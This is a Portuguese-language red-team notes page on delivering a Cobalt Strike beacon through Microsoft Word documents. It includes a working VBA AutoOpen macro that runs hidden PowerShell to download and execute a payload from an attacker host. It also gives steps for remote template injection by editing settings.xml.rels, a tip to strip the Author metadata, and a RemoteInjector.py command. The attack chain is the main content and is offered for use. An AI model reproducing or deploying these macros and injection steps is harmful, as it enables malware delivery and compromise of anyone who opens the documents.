Beacon - Microsoft Word

Arquivo Doc (Word 2003+)

Abra CS Client, vá no Menu Attacks > Scripted Web Delivery (S) e defina a URI que desejar, selecione o Listener (pode ser o HTTP), deixe o tipo como powershell e a flag marcada em User x64 payload. Irá ser exibido um popup com um comando, copie este comando e guarde em algum lugar.

Agora abra o Word, gere uma nova Macro no botão que localizado no menu View > Macro. Na janela que abrir, defina o nome da macro como AutoOpen, vá em Macros in, selecion Document1 e depois clique em Create. Feito isso, deixe a macro somente com o script abaixo. Note que na penúltima linha é preciso alterar para o comando que foi gerado no CS. Presta atenção nas aspas duplas.

Sub AutoOpen()
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://<ip>/<uri>'))"""
End Sub

Agora salve o arquivo com formato .doc e lembre-se de remover o Author

Arquivo Dot + Dotx (Word Templates)

Crie um arquivo semelhante ao .doc anterior, porém salve-o com o nome template.dot. Abra o CS, vá no Menu Site Management > Host File, na janela que abrir, selecione o arquivo que acabou de criar (template.dot), em Local URI insira /template.dot e clique em launcher. No popup, copie o endereço que aparecer. No explorer do Windows, vá em Documents\Custom Office Templates e abra um template. Geralmente vem o Blank Template.dotx, então abra-o e salve com a extensão .docx no mesmo diretório do arquivo template.dot. Vá no local onde salvou o arquivo .docx, clique com o botão direito do mouse no arquivo e vá em 7-Zip > Open archive. Navegue então até o arquivo word\_rels\settings.xml.rels, clique com o botão direito e clique em edit. No final do arquivo, irá ter uma chava Target, que aponta para o template que utilizamos (Documents\Custom Office Templates\Blank Template.dotx), então vamos alterar para o caminho remoto que copiamos no popup do CS.

OBS.: Sempre que disponibilizar arquivos vie web, como por exemplo ao usarmos o Site Management > Host File, habilite o log no Menu View > Web Log.

RemoteInjector.py

Para automatizar o que feito acima, podemos utilizar esse tool através do seguinte comando:

python3 remoteinjector.py -w <caminho-remoto-gerado-cobaltstrike>

Sites

# RemoteInjector.py
https://github.com/JohnWoodman/remoteInjector.git
PreviousCobalt StrikeNextReconnaissance (Pós-Exploração)

Last updated

Was this helpful?